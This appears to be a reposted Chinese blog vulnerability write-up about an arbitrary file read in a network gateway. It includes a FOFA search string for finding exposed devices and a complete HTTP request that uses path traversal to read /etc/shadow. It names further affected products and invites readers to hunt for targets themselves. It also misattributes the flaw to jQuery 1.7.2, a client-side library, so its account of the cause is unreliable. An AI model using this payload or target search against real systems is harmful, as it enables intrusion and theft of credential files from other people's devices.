jQuery-1.7.2存在任意文件读取漏洞
2023-12-27 19:42:04
jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
1.漏洞级别
高危
2.漏洞搜索
fofa
body="webui/js/jquerylib/jquery-1.7.2.min.js"
3.影响范围
jQuery-1.7.2
4.漏洞复现
我们以使用该插件的安博通网关为例:
构造
GET /webui/?file_name=../../../../../etc/shadow&g=sys_dia_data_down HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: USGSESSID=ddc4875e875c49403c35ccfbcef07db1
Upgrade-Insecure-Requests: 1
返回内容即为文件内容:
不难看出file_name就是控制文件路径的参数,我们可以简单的得出访问任意文件的构造访问
file_name=../../../../../etc/shadow. =/etc/shadow
file_name=../../../../../bin/bash =/bin/bash
漏洞相对比较简单。
5.后话
因为jquery是个非常常用的插件,所以很多饮用该版本的系统都会存在漏洞,大量的网关系统就因此中招了,已知的就有这些。
如:
飞鱼星下一代防火墙安全网关;/任天行网络安全管理系统;等等很多很多。有兴趣大家可以自己找找看。
后续还会随文章附赠一个简单的利用脚本,如果有问题欢迎随时沟通~
文章来源:https://blog.csdn.net/xiayu729100940/article/details/135252686
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!